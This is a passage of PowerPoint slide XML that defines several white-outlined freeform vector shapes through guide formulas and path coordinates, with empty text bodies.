                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="51"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36291" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4598" y="2786"/>
                <a:ext cx="22" cy="23"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 22"/>
                  <a:gd name="T1" fmla="*/ 23 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 22"/>
                  <a:gd name="T3" fmla="*/ 23 h 23"/>
                  <a:gd name="T4" fmla="*/ 1 w 22"/>
                  <a:gd name="T5" fmla="*/ 19 h 23"/>
                  <a:gd name="T6" fmla="*/ 4 w 22"/>
                  <a:gd name="T7" fmla="*/ 16 h 23"/>
                  <a:gd name="T8" fmla="*/ 6 w 22"/>
                  <a:gd name="T9" fmla="*/ 14 h 23"/>
                  <a:gd name="T10" fmla="*/ 10 w 22"/>
                  <a:gd name="T11" fmla="*/ 11 h 23"/>
                  <a:gd name="T12" fmla="*/ 15 w 22"/>
                  <a:gd name="T13" fmla="*/ 8 h 23"/>
                  <a:gd name="T14" fmla="*/ 22 w 22"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 22 w 22"/>
                  <a:gd name="T17" fmla="*/ 4 h 23"/>
                  <a:gd name="T18" fmla="*/ 21 w 22"/>
                  <a:gd name="T19" fmla="*/ 7 h 23"/>
                  <a:gd name="T20" fmla="*/ 20 w 22"/>
                  <a:gd name="T21" fmla="*/ 9 h 23"/>
                  <a:gd name="T22" fmla="*/ 18 w 22"/>
                  <a:gd name="T23" fmla="*/ 10 h 23"/>
                  <a:gd name="T24" fmla="*/ 14 w 22"/>
                  <a:gd name="T25" fmla="*/ 12 h 23"/>
                  <a:gd name="T26" fmla="*/ 13 w 22"/>
                  <a:gd name="T27" fmla="*/ 13 h 23"/>
                  <a:gd name="T28" fmla="*/ 11 w 22"/>
                  <a:gd name="T29" fmla="*/ 17 h 23"/>
                  <a:gd name="T30" fmla="*/ 9 w 22"/>
                  <a:gd name="T31" fmla="*/ 19 h 23"/>
                  <a:gd name="T32" fmla="*/ 5 w 22"/>
                  <a:gd name="T33" fmla="*/ 20 h 23"/>
                  <a:gd name="T34" fmla="*/ 2 w 22"/>
                  <a:gd name="T35" fmla="*/ 23 h 23"/>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2"/>
                  <a:gd name="T55" fmla="*/ 0 h 23"/>
                  <a:gd name="T56" fmla="*/ 22 w 22"/>
                  <a:gd name="T57" fmla="*/ 23 h 23"/>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2" h="23">
                    <a:moveTo>
                      <a:pt x="2" y="23"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36292" name="Freeform 24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4680" y="2769"/>
                <a:ext cx="16" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 16"/>
                  <a:gd name="T1" fmla="*/ 31 h 31"/>
                  <a:gd name="T2" fmla="*/ 7 w 16"/>
                  <a:gd name="T3" fmla="*/ 28 h 31"/>
                  <a:gd name="T4" fmla="*/ 1 w 16"/>
                  <a:gd name="T5" fmla="*/ 24 h 31"/>
                  <a:gd name="T6" fmla="*/ 0 w 16"/>
                  <a:gd name="T7" fmla="*/ 21 h 31"/>
                  <a:gd name="T8" fmla="*/ 0 w 16"/>
                  <a:gd name="T9" fmla="*/ 18 h 31"/>
                  <a:gd name="T10" fmla="*/ 4 w 16"/>
                  <a:gd name="T11" fmla="*/ 17 h 31"/>
                  <a:gd name="T12" fmla="*/ 6 w 16"/>
                  <a:gd name="T13" fmla="*/ 15 h 31"/>
                  <a:gd name="T14" fmla="*/ 9 w 16"/>
                  <a:gd name="T15" fmla="*/ 2 h 31"/>
                  <a:gd name="T16" fmla="*/ 13 w 16"/>
                  <a:gd name="T17" fmla="*/ 0 h 31"/>
                  <a:gd name="T18" fmla="*/ 14 w 16"/>
                  <a:gd name="T19" fmla="*/ 1 h 31"/>
                  <a:gd name="T20" fmla="*/ 15 w 16"/>
                  <a:gd name="T21" fmla="*/ 1 h 31"/>
                  <a:gd name="T22" fmla="*/ 16 w 16"/>
                  <a:gd name="T23" fmla="*/ 4 h 31"/>
                  <a:gd name="T24" fmla="*/ 13 w 16"/>
                  <a:gd name="T25" fmla="*/ 10 h 31"/>
                  <a:gd name="T26" fmla="*/ 12 w 16"/>
                  <a:gd name="T27" fmla="*/ 12 h 31"/>
                  <a:gd name="T28" fmla="*/ 10 w 16"/>
                  <a:gd name="T29" fmla="*/ 22 h 31"/>
                  <a:gd name="T30" fmla="*/ 11 w 16"/>
                  <a:gd name="T31" fmla="*/ 24 h 31"/>
                  <a:gd name="T32" fmla="*/ 13 w 16"/>
                  <a:gd name="T33" fmla="*/ 27 h 31"/>
                  <a:gd name="T34" fmla="*/ 11 w 16"/>
                  <a:gd name="T35" fmla="*/ 30 h 31"/>
                  <a:gd name="T36" fmla="*/ 10 w 16"/>
                  <a:gd name="T37" fmla="*/ 31 h 3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6"/>
                  <a:gd name="T58" fmla="*/ 0 h 31"/>
                  <a:gd name="T59" fmla="*/ 16 w 16"/>
                  <a:gd name="T60" fmla="*/ 31 h 31"/>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6" h="31">
                    <a:moveTo>
                      <a:pt x="10" y="31"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="31"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36293" name="Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4623" y="2765"/>
                <a:ext cx="13" cy="19"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 13"/>
                  <a:gd name="T1" fmla="*/ 19 h 19"/>
                  <a:gd name="T2" fmla="*/ 0 w 13"/>
                  <a:gd name="T3" fmla="*/ 19 h 19"/>
                  <a:gd name="T4" fmla="*/ 0 w 13"/>
                  <a:gd name="T5" fmla="*/ 17 h 19"/>
                  <a:gd name="T6" fmla="*/ 2 w 13"/>
                  <a:gd name="T7" fmla="*/ 16 h 19"/>
                  <a:gd name="T8" fmla="*/ 4 w 13"/>
                  <a:gd name="T9" fmla="*/ 13 h 19"/>
                  <a:gd name="T10" fmla="*/ 6 w 13"/>
                  <a:gd name="T11" fmla="*/ 9 h 19"/>
                  <a:gd name="T12" fmla="*/ 7 w 13"/>
                  <a:gd name="T13" fmla="*/ 5 h 19"/>
                  <a:gd name="T14" fmla="*/ 8 w 13"/>
                  <a:gd name="T15" fmla="*/ 1 h 19"/>
                  <a:gd name="T16" fmla="*/ 10 w 13"/>
                  <a:gd name="T17" fmla="*/ 0 h 19"/>
                  <a:gd name="T18" fmla="*/ 11 w 13"/>
                  <a:gd name="T19" fmla="*/ 1 h 19"/>
                  <a:gd name="T20" fmla="*/ 10 w 13"/>
                  <a:gd name="T21" fmla="*/ 3 h 19"/>
                  <a:gd name="T22" fmla="*/ 12 w 13"/>
                  <a:gd name="T23" fmla="*/ 7 h 19"/>
                  <a:gd name="T24" fmla="*/ 13 w 13"/>
                  <a:gd name="T25" fmla="*/ 11 h 19"/>
                  <a:gd name="T26" fmla="*/ 12 w 13"/>
                  <a:gd name="T27" fmla="*/ 12 h 19"/>
                  <a:gd name="T28" fmla="*/ 8 w 13"/>
                  <a:gd name="T29" fmla="*/ 15 h 19"/>
                  <a:gd name="T30" fmla="*/ 5 w 13"/>
                  <a:gd name="T31" fmla="*/ 17 h 19"/>
                  <a:gd name="T32" fmla="*/ 2 w 13"/>
                  <a:gd name="T33" fmla="*/ 19 h 19"/>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3"/>
                  <a:gd name="T52" fmla="*/ 0 h 19"/>
                  <a:gd name="T53" fmla="*/ 13 w 13"/>
                  <a:gd name="T54" fmla="*/ 19 h 19"/>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3" h="19">
                    <a:moveTo>
                      <a:pt x="2" y="19"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36294" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4673" y="2756"/>
                <a:ext cx="17" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 17"/>
                  <a:gd name="T1" fmla="*/ 21 h 21"/>
                  <a:gd name="T2" fmla="*/ 0 w 17"/>
                  <a:gd name="T3" fmla="*/ 18 h 21"/>
                  <a:gd name="T4" fmla="*/ 1 w 17"/>
                  <a:gd name="T5" fmla="*/ 9 h 21"/>
                  <a:gd name="T6" fmla="*/ 2 w 17"/>
                  <a:gd name="T7" fmla="*/ 0 h 21"/>
                  <a:gd name="T8" fmla="*/ 5 w 17"/>
                  <a:gd name="T9" fmla="*/ 3 h 21"/>
                  <a:gd name="T10" fmla="*/ 9 w 17"/>
                  <a:gd name="T11" fmla="*/ 5 h 21"/>
                  <a:gd name="T12" fmla="*/ 12 w 17"/>
                  <a:gd name="T13" fmla="*/ 5 h 21"/>
                  <a:gd name="T14" fmla="*/ 16 w 17"/>
                  <a:gd name="T15" fmla="*/ 4 h 21"/>
                  <a:gd name="T16" fmla="*/ 17 w 17"/>
                  <a:gd name="T17" fmla="*/ 7 h 21"/>
                  <a:gd name="T18" fmla="*/ 16 w 17"/>
                  <a:gd name="T19" fmla="*/ 10 h 21"/>
                  <a:gd name="T20" fmla="*/ 14 w 17"/>
                  <a:gd name="T21" fmla="*/ 12 h 21"/>
                  <a:gd name="T22" fmla="*/ 13 w 17"/>
                  <a:gd name="T23" fmla="*/ 13 h 21"/>
                  <a:gd name="T24" fmla="*/ 7 w 17"/>
                  <a:gd name="T25" fmla="*/ 18 h 21"/>
                  <a:gd name="T26" fmla="*/ 0 w 17"/>
                  <a:gd name="T27" fmla="*/ 21 h 2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7"/>
                  <a:gd name="T43" fmla="*/ 0 h 21"/>
                  <a:gd name="T44" fmla="*/ 17 w 17"/>
                  <a:gd name="T45" fmla="*/ 21 h 21"/>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7" h="21">
                    <a:moveTo>
                      <a:pt x="0" y="21"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36295" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4711" y="2744"/>
                <a:ext cx="18" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 16 w 18"/>
                  <a:gd name="T1" fmla="*/ 22 h 22"/>
                  <a:gd name="T2" fmla="*/ 12 w 18"/>
                  <a:gd name="T3" fmla="*/ 20 h 22"/>
                  <a:gd name="T4" fmla="*/ 11 w 18"/>
                  <a:gd name="T5" fmla="*/ 19 h 22"/>
                  <a:gd name="T6" fmla="*/ 9 w 18"/>
                  <a:gd name="T7" fmla="*/ 17 h 22"/>
                  <a:gd name="T8" fmla="*/ 9 w 18"/>
                  <a:gd name="T9" fmla="*/ 16 h 22"/>
                  <a:gd name="T10" fmla="*/ 10 w 18"/>
                  <a:gd name="T11" fmla="*/ 14 h 22"/>
                  <a:gd name="T12" fmla="*/ 9 w 18"/>
                  <a:gd name="T13" fmla="*/ 11 h 22"/>
                  <a:gd name="T14" fmla="*/ 5 w 18"/>
                  <a:gd name="T15" fmla="*/ 8 h 22"/>
                  <a:gd name="T16" fmla="*/ 1 w 18"/>
                  <a:gd name="T17" fmla="*/ 5 h 22"/>
                  <a:gd name="T18" fmla="*/ 0 w 18"/>
                  <a:gd name="T19" fmla="*/ 1 h 22"/>
                  <a:gd name="T20" fmla="*/ 3 w 18"/>
                  <a:gd name="T21" fmla="*/ 1 h 22"/>
                  <a:gd name="T22" fmla="*/ 11 w 18"/>
                  <a:gd name="T23" fmla="*/ 0 h 22"/>
                  <a:gd name="T24" fmla="*/ 13 w 18"/>
                  <a:gd name="T25" fmla="*/ 0 h 22"/>
                  <a:gd name="T26" fmla="*/ 15 w 18"/>
                  <a:gd name="T27" fmla="*/ 3 h 22"/>
                  <a:gd name="T28" fmla="*/ 16 w 18"/>
                  <a:gd name="T29" fmla="*/ 9 h 22"/>
                  <a:gd name="T30" fmla="*/ 17 w 18"/>
                  <a:gd name="T31" fmla="*/ 15 h 22"/>
                  <a:gd name="T32" fmla="*/ 18 w 18"/>
                  <a:gd name="T33" fmla="*/ 21 h 22"/>
                  <a:gd name="T34" fmla="*/ 18 w 18"/>
                  <a:gd name="T35" fmla="*/ 22 h 22"/>
                  <a:gd name="T36" fmla="*/ 16 w 18"/>
                  <a:gd name="T37" fmla="*/ 22 h 2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8"/>
                  <a:gd name="T58" fmla="*/ 0 h 22"/>
                  <a:gd name="T59" fmla="*/ 18 w 18"/>
                  <a:gd name="T60" fmla="*/ 22 h 22"/>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8" h="22">
                    <a:moveTo>
                      <a:pt x="16" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="22"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36296" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4649" y="2729"/>
                <a:ext cx="15" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 15"/>
                  <a:gd name="T1" fmla="*/ 20 h 20"/>
                  <a:gd name="T2" fmla="*/ 8 w 15"/>
                  <a:gd name="T3" fmla="*/ 17 h 20"/>
                  <a:gd name="T4" fmla="*/ 6 w 15"/>
                  <a:gd name="T5" fmla="*/ 14 h 20"/>
                  <a:gd name="T6" fmla="*/ 5 w 15"/>
                  <a:gd name="T7" fmla="*/ 13 h 20"/>
                  <a:gd name="T8" fmla="*/ 3 w 15"/>
                  <a:gd name="T9" fmla="*/ 4 h 20"/>
                  <a:gd name="T10" fmla="*/ 0 w 15"/>
                  <a:gd name="T11" fmla="*/ 1 h 20"/>
                  <a:gd name="T12" fmla="*/ 4 w 15"/>
                  <a:gd name="T13" fmla="*/ 0 h 20"/>
                  <a:gd name="T14" fmla="*/ 11 w 15"/>
                  <a:gd name="T15" fmla="*/ 0 h 20"/>
                  <a:gd name="T16" fmla="*/ 13 w 15"/>
                  <a:gd name="T17" fmla="*/ 2 h 20"/>
                  <a:gd name="T18" fmla="*/ 15 w 15"/>
                  <a:gd name="T19" fmla="*/ 5 h 20"/>
                  <a:gd name="T20" fmla="*/ 15 w 15"/>
                  <a:gd name="T21" fmla="*/ 11 h 20"/>
                  <a:gd name="T22" fmla="*/ 14 w 15"/>
                  <a:gd name="T23" fmla="*/ 15 h 20"/>
                  <a:gd name="T24" fmla="*/ 13 w 15"/>
                  <a:gd name="T25" fmla="*/ 17 h 20"/>
                  <a:gd name="T26" fmla="*/ 11 w 15"/>
                  <a:gd name="T27" fmla="*/ 20 h 2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5"/>
                  <a:gd name="T43" fmla="*/ 0 h 20"/>
                  <a:gd name="T44" fmla="*/ 15 w 15"/>
                  <a:gd name="T45" fmla="*/ 20 h 2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5" h="20">
                    <a:moveTo>
                      <a:pt x="11" y="20"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="20"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36297" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4791" y="2134"/>
                <a:ext cx="256" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 122 w 256"/>
                  <a:gd name="T1" fmla="*/ 177 h 295"/>
                  <a:gd name="T2" fmla="*/ 131 w 256"/>
                  <a:gd name="T3" fmla="*/ 180 h 295"/>
                  <a:gd name="T4" fmla="*/ 159 w 256"/>
                  <a:gd name="T5" fmla="*/ 157 h 295"/>
                  <a:gd name="T6" fmla="*/ 169 w 256"/>
                  <a:gd name="T7" fmla="*/ 134 h 295"/>
                  <a:gd name="T8" fmla="*/ 169 w 256"/>
                  <a:gd name="T9" fmla="*/ 115 h 295"/>
                  <a:gd name="T10" fmla="*/ 179 w 256"/>
                  <a:gd name="T11" fmla="*/ 100 h 295"/>
                  <a:gd name="T12" fmla="*/ 182 w 256"/>
                  <a:gd name="T13" fmla="*/ 91 h 295"/>
                  <a:gd name="T14" fmla="*/ 193 w 256"/>
                  <a:gd name="T15" fmla="*/ 107 h 295"/>
                  <a:gd name="T16" fmla="*/ 194 w 256"/>
                  <a:gd name="T17" fmla="*/ 142 h 295"/>
                  <a:gd name="T18" fmla="*/ 185 w 256"/>
                  <a:gd name="T19" fmla="*/ 156 h 295"/>
                  <a:gd name="T20" fmla="*/ 180 w 256"/>
                  <a:gd name="T21" fmla="*/ 186 h 295"/>
                  <a:gd name="T22" fmla="*/ 177 w 256"/>
                  <a:gd name="T23" fmla="*/ 208 h 295"/>
                  <a:gd name="T24" fmla="*/ 170 w 256"/>
                  <a:gd name="T25" fmla="*/ 208 h 295"/>
                  <a:gd name="T26" fmla="*/ 154 w 256"/>
                  <a:gd name="T27" fmla="*/ 223 h 295"/>
                  <a:gd name="T28" fmla="*/ 147 w 256"/>
                  <a:gd name="T29" fmla="*/ 218 h 295"/>
                  <a:gd name="T30" fmla="*/ 126 w 256"/>
                  <a:gd name="T31" fmla="*/ 227 h 295"/>
                  <a:gd name="T32" fmla="*/ 114 w 256"/>
                  <a:gd name="T33" fmla="*/ 227 h 295"/>
                  <a:gd name="T34" fmla="*/ 106 w 256"/>
                  <a:gd name="T35" fmla="*/ 242 h 295"/>
                  <a:gd name="T36" fmla="*/ 90 w 256"/>
                  <a:gd name="T37" fmla="*/ 234 h 295"/>
